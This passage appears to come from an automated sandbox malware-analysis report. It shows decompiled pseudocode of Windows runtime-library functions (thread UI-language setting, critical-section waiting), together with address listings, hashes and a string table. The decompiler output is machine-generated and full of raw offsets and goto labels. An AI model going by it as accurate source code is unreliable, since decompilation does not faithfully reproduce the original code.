											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E048BB7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E048BE2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E048BA890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                          0x0487b171
                          0x0487b171
                          0x0487b171
                          0x0487b171
                          0x0487b171
                          0x0487b176
                          0x0487b17b
                          0x0487b180
                          0x0487b186
                          0x0487b18f
                          0x0487b198
                          0x0487b1a4
                          0x0487b1aa
                          0x048d4802
                          0x048d4802
                          0x048d4805
                          0x048d480c
                          0x048d480e
                          0x0487b1d1
                          0x0487b1d3
                          0x0487b1de
                          0x0487b1de
                          0x048d4817
                          0x048d481e
                          0x048d4820
                          0x048d4822
                          0x048d4822
                          0x048d4824
                          0x048d4824
                          0x048d482a
                          0x00000000
                          0x00000000
                          0x048d4835
                          0x048d483a
                          0x048d483d
                          0x048d483f
                          0x048d4842
                          0x048d4842
                          0x048d4842
                          0x048d4846
                          0x048d484c
                          0x048d484e
                          0x048d4851
                          0x048d4851
                          0x048d4853
                          0x048d4854
                          0x048d4854
                          0x048d4858
                          0x048d485a
                          0x048d485a
                          0x048d485d
                          0x048d485f
                          0x048d4861
                          0x048d4861
                          0x048d4866
                          0x048d486b
                          0x048d486e
                          0x048d4871
                          0x048d4876
                          0x048d4876
                          0x048d4878
                          0x048d487b
                          0x048d4884
                          0x048d4884
                          0x00000000
                          0x048d487d
                          0x048d487d
                          0x048d4882
                          0x048d4889
                          0x048d4889
                          0x048d488f
                          0x048d4891
                          0x048d48e0
                          0x048d48e2
                          0x048d48e4
                          0x048d48e4
                          0x048d48e7
                          0x048d48e7
                          0x048d48ed
                          0x048d48f4
                          0x048d48f6
                          0x048d4951
                          0x048d4951
                          0x048d4953
                          0x048d4953
                          0x048d4956
                          0x048d4956
                          0x048d4958
                          0x048d4959
                          0x048d4959
                          0x048d495d
                          0x048d495d
                          0x048d495f
                          0x048d495f
                          0x048d4965
                          0x048d4969
                          0x048d49ba
                          0x048d49ba
                          0x048d49c1
                          0x048d49c5
                          0x048d49cc
                          0x048d49d4
                          0x048d49d7
                          0x048d49da
                          0x048d49e4
                          0x048d49e5
                          0x048d49f3
                          0x048d4a02
                          0x00000000
                          0x048d4a02
                          0x048d4972
                          0x048d4974
                          0x00000000
                          0x00000000
                          0x048d4976
                          0x048d4979
                          0x048d4982
                          0x048d4983
                          0x048d4984
                          0x048d498b
                          0x048d498d
                          0x048d4991
                          0x048d4993
                          0x048d4999
                          0x048d499d
                          0x048d49a2
                          0x048d49a2
                          0x048d49a2
                          0x048d4999
                          0x048d49ac
                          0x00000000
                          0x048d49b3
                          0x048d48f8
                          0x048d48fe
                          0x00000000
                          0x00000000
                          0x00000000
                          0x048d48fe
                          0x048d4895
                          0x048d489c
                          0x048d48ad
                          0x048d48b2
                          0x048d48b5
                          0x048d48b7
                          0x048d48ba
                          0x048d48bc
                          0x048d48c6
                          0x048d48c6
                          0x048d48cb
                          0x048d48d1
                          0x048d48d4
                          0x048d48d8
                          0x048d48d8
                          0x00000000
                          0x048d48d8
                          0x048d48be
                          0x048d48c0
                          0x00000000
                          0x00000000
                          0x048d48c2
                          0x00000000
                          0x00000000
                          0x00000000
                          0x048d48c4
                          0x00000000
                          0x048d4882
                          0x048d487b
                          0x048d4904
                          0x048d4906
                          0x00000000
                          0x00000000
                          0x048d4908
                          0x048d490e
                          0x00000000
                          0x00000000
                          0x048d4910
                          0x048d4917
                          0x048d4917
                          0x00000000
                          0x048d4917
                          0x0487b1ba
                          0x048d47f9
                          0x048d47fc
                          0x00000000
                          0x00000000
                          0x00000000
                          0x048d47fc
                          0x0487b1c0
                          0x0487b1c0
                          0x0487b1c3
                          0x0487b1cb
                          0x00000000
                          0x00000000
                          0x00000000

                          APIs
                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID: _vswprintf_s
                          • String ID:
                          • API String ID: 677850445-0
                          • Opcode ID: 6c37e7b9bea6867d2a9c2f0ec29267803d2e4a15efa5c229b4dff4f23aac2a0c
                          • Instruction ID: e06de5ce676b31531477b7e641fab632178adb4a0f30023db41bd2cb07418cf5
                          • Opcode Fuzzy Hash: 6c37e7b9bea6867d2a9c2f0ec29267803d2e4a15efa5c229b4dff4f23aac2a0c
                          • Instruction Fuzzy Hash: E3510171D012599FEB31CF68C840BAEBBB0AF00B14F104BBDD899EB295D770A9419B91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 048AFAB0, Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                          Download Yara Rule
                          C-Code - Quality: 80%
                          			E048AFAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E0488EEF0(0x4967b60);
					_t134 =  *0x4967b84; // 0x771c7b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x4967b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x4967b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E04886D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E048876E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E04918938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E0487B150();
													}
													_t116 = E04916D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E048875CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x4968638; // 0x69f988
																	_t122 = L048838A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E048876E2(_t154);
																			goto L41;
																		}
																	} else {
																		E048876E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L048AFCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L048870F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E048AFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E048AFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E048AFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E048AFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E048AFD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x4967b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x4967b84 = _t75;
						_t73 = E0488EB70(_t134, 0x4967b60);
						if( *0x4967b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E0488FF60( *0x4967b20);
							}
						}
						goto L5;
					}
				}
			}

















































                          0x048afab0
                          0x048afab2
                          0x048afab3
                          0x048afab4
                          0x048afabc
                          0x048afac0
                          0x048afb14
                          0x048afb17
                          0x048afac2
                          0x048afac8
                          0x048afacd
                          0x048afad3
                          0x048afad3
                          0x048afadd
                          0x048afb18
                          0x048afb1b
                          0x048afb1d
                          0x048afb1e
                          0x048afb1f
                          0x048afb20
                          0x048afb21
                          0x048afb22
                          0x048afb23
                          0x048afb24
                          0x048afb25
                          0x048afb26
                          0x048afb27
                          0x048afb28
                          0x048afb29
                          0x048afb2a
                          0x048afb2b
                          0x048afb2c
                          0x048afb2d
                          0x048afb2e
                          0x048afb2f
                          0x048afb3a
                          0x048afb3b
                          0x048afb3e
                          0x048afb41
                          0x048afb44
                          0x048afb47
                          0x048afb4a
                          0x048afb4d
                          0x048afb53
                          0x048ebdcb
                          0x048ebdcb
                          0x048afb59
                          0x048afb5b
                          0x048afb5b
                          0x048afb5e
                          0x048ebdd5
                          0x048ebdd8
                          0x00000000
                          0x048ebdda
                          0x00000000
                          0x048ebdda
                          0x048afb64
                          0x048afb64
                          0x048afb64
                          0x048afb67
                          0x048afb6e
                          0x048afb70
                          0x048afb72
                          0x00000000
                          0x048afb78
                          0x048afb7a
                          0x048afb7a
                          0x048afb7d
                          0x048afb80
                          0x048ebddf
                          0x048ebde1
                          0x00000000
                          0x048ebde3
                          0x00000000
                          0x048ebde3
                          0x048afb86
                          0x048afb86
                          0x048afb86
                          0x048afb8b
                          0x048afb90
                          0x048afb92
                          0x048afb94
                          0x048afb9a
                          0x048afb9b
                          0x048afba1
                          0x048ebde8
                          0x048ebdeb
                          0x048ebded
                          0x048ebeb5
                          0x048ebeb5
                          0x048ebebb
                          0x048ebebd
                          0x048ebec3
                          0x048ebed2
                          0x048ebedd
                          0x048ebedd
                          0x048ebeed
                          0x00000000
                          0x048ebdf3
                          0x048ebdfe
                          0x048ebe06
                          0x048ebe0b
                          0x048ebe0d
                          0x048ebe0f
                          0x048ebe14
                          0x048ebe19
                          0x048ebe20
                          0x048ebe25
                          0x048ebe27
                          0x048ebe35
                          0x048ebe39
                          0x048ebe46
                          0x048ebe4f
                          0x048ebe54
                          0x048ebe56
                          0x048ebef8
                          0x048ebef8
                          0x00000000
                          0x048ebe5c
                          0x048ebe5c
                          0x048ebe60
                          0x00000000
                          0x048ebe66
                          0x048ebe66
                          0x048ebe7f
                          0x048ebe84
                          0x048ebe87
                          0x048ebe89
                          0x048ebe8b
                          0x048ebe99
                          0x048ebe9d
                          0x048ebea0
                          0x048ebeac
                          0x048ebeaf
                          0x048ebeb1
                          0x048ebeb3
                          0x048ebeb3
                          0x00000000
                          0x048ebea2
                          0x048ebea2
                          0x00000000
                          0x048ebea2
                          0x048ebe8d
                          0x048ebe8d
                          0x048ebe92
                          0x00000000
                          0x048ebe92
                          0x048ebe8b
                          0x048ebe60
                          0x048ebe3b
                          0x048ebe3b
                          0x048ebe3e
                          0x00000000
                          0x048ebe40
                          0x048ebe40
                          0x048ebe44
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x048ebe44
                          0x048ebe3e
                          0x048ebe29
                          0x048ebe29
                          0x00000000
                          0x048ebe29
                          0x048ebe27
                          0x00000000
                          0x048afba7
                          0x048afba7
                          0x048afbab
                          0x048ebf02
                          0x048afbb1
                          0x048afbb1
                          0x048afbb8
                          0x048afbbd
                          0x048afbbd
                          0x048afbbf
                          0x048afbbf
                          0x048afbc5
                          0x048afbcb
                          0x048afbf8
                          0x048afbf8
                          0x048afbfa
                          0x00000000
                          0x048afc00
                          0x048afc00
                          0x048afc03
                          0x00000000
                          0x048afc09
                          0x048afc09
                          0x048afc0f
                          0x048afc15
                          0x048afc23
                          0x048afc23
                          0x048afc25
                          0x048afc27
                          0x048afc75
                          0x048afc7c
                          0x048afc84
                          0x00000000
                          0x048afc29
                          0x048afc29
                          0x048afc2d
                          0x048afc30
                          0x048ebf0f
                          0x00000000
                          0x048afc36
                          0x048afc38
                          0x048afc3b
                          0x048afc41
                          0x048ebf17
                          0x048ebf19
                          0x048ebf48
                          0x048ebf4b
                          0x00000000
                          0x048ebf1b
                          0x048ebf22
                          0x048ebf24
                          0x048ebf26
                          0x00000000
                          0x048ebf2c
                          0x048ebf37
                          0x048ebf39
                          0x048ebf3b
                          0x00000000
                          0x048ebf41
                          0x048ebf41
                          0x048ebf41
                          0x048ebf41
                          0x048ebf45
                          0x00000000
                          0x048ebf45
                          0x048ebf3b
                          0x048ebf26
                          0x00000000
                          0x048afc47
                          0x048afc47
                          0x048afc49
                          0x048afcb2
                          0x048afcb4
                          0x048afcb6
                          0x048afcdc
                          0x048afcdc
                          0x00000000
                          0x048afcb8
                          0x048afcc3
                          0x048afcc5
                          0x048afcc7
                          0x00000000
                          0x048afcc9
                          0x048afcc9
                          0x048afccd
                          0x00000000
                          0x048afccd
                          0x048afcc7
                          0x00000000
                          0x048afc4b
                          0x048afc4b
                          0x048afc4e
                          0x048afc4e
                          0x048afc51
                          0x048afc51
                          0x048afc54
                          0x048afc5a
                          0x048afc5c
                          0x048afc5f
                          0x048afc61
                          0x048afc63
                          0x048afc65
                          0x048afc67
                          0x048afc6e
                          0x048afc72
                          0x048afc72
                          0x048afc72
                          0x048afc72
                          0x048afc67
                          0x048afc61
                          0x00000000
                          0x048afc5a
                          0x048afc49
                          0x048afc41
                          0x048afc30
                          0x048afc27
                          0x048afc03
                          0x048afbcd
                          0x048afbd3
                          0x048afbd9
                          0x048afbdc
                          0x048afbde
                          0x048afc99
                          0x048afc9b
                          0x048afc9d
                          0x048afcd5
                          0x048afcd5
                          0x048afc89
                          0x048afc89
                          0x00000000
                          0x048afc9f
                          0x048afc9f
                          0x048afca3
                          0x00000000
                          0x048afca3
                          0x00000000
                          0x048afbe4
                          0x048afbe4
                          0x048afbe4
                          0x048afbe4
                          0x048afbe9
                          0x048afbf2
                          0x00000000
                          0x048afbf2
                          0x048afbde
                          0x048afbcb
                          0x048afbab
                          0x048afc8b
                          0x048afc8b
                          0x048afc8c
                          0x048afb80
                          0x048afb72
                          0x048afb5e
                          0x048afc8d
                          0x048afc91
                          0x048afadf
                          0x048afadf
                          0x048afae1
                          0x048afae4
                          0x048afae7
                          0x048afaec
                          0x048afaf8
                          0x048afb00
                          0x048afb07
                          0x048afb0f
                          0x048afb0f
                          0x048afb07
                          0x00000000
                          0x048afaf8
                          0x048afadd

                          Strings
                          • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 048EBE0F
                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                          • API String ID: 0-865735534
                          • Opcode ID: 06e9b894d836417410693f80954cb4562ad91df92301c6c64bcc1dbdd2e6da13
                          • Instruction ID: 8a12b1873934d9e224a46f3ee16d1cdf3acae3e6c80eca564a32e1e25164adcb
                          • Opcode Fuzzy Hash: 06e9b894d836417410693f80954cb4562ad91df92301c6c64bcc1dbdd2e6da13
                          • Instruction Fuzzy Hash: 2AA1D031B006168BEB25DF6AC45077AB3B5AB45718F144F69EA46DB680EBB4F841CB80
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 04872D8A, Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                          Download Yara Rule
                          C-Code - Quality: 63%
                          			E04872D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x4965350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x4967bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E048B97C0();
				}
				if( *0x49679c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x49679c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E048A1624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E04897D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E0490FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E048B9520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E048AE18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L048CDF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x4966901;
								_push(_t109);
								_v52 = _t98;
								if( *0x4966901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E048B9980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E048B95D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E04897D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E04897D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E048F7016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E0490FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x4965350;
							if(_t109 != 0x4965350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E0490FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E04905720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}




































                          0x04872d8a
                          0x04872d8a
                          0x04872d92
                          0x04872d96
                          0x04872d9e
                          0x04872da0
                          0x04872da3
                          0x04872da5
                          0x04872da8
                          0x04872dab
                          0x04872db2
                          0x048cf9aa
                          0x048cf9ab
                          0x048cf9ae
                          0x048cf9ae
                          0x04872db8
                          0x04872dc2
                          0x048cf9b9
                          0x048cf9be
                          0x048cf9bf
                          0x048cf9bf
                          0x04872dcf
                          0x048cf9c9
                          0x04872dd5
                          0x04872dd5
                          0x04872dd5
                          0x04872dde
                          0x04872de1
                          0x04872e70
                          0x04872e72
                          0x04872e72
                          0x04872de7
                          0x04872deb
                          0x04872e7c
                          0x04872e83
                          0x04872e85
                          0x04872e8b
                          0x04872e8d
                          0x04872e92
                          0x04872e92
                          0x04872e85
                          0x04872df1
                          0x04872df7
                          0x04872df9
                          0x04872df9
                          0x04872dfc
                          0x04872dff
                          0x04872e02
                          0x00000000
                          0x04872e05
                          0x04872e0c
                          0x048cf9d9
                          0x04872e12
                          0x04872e12
                          0x04872e12
                          0x04872e1a
                          0x048cf9e3
                          0x048cf9e9
                          0x048cf9f0
                          0x048cf9f6
                          0x048cf9f8
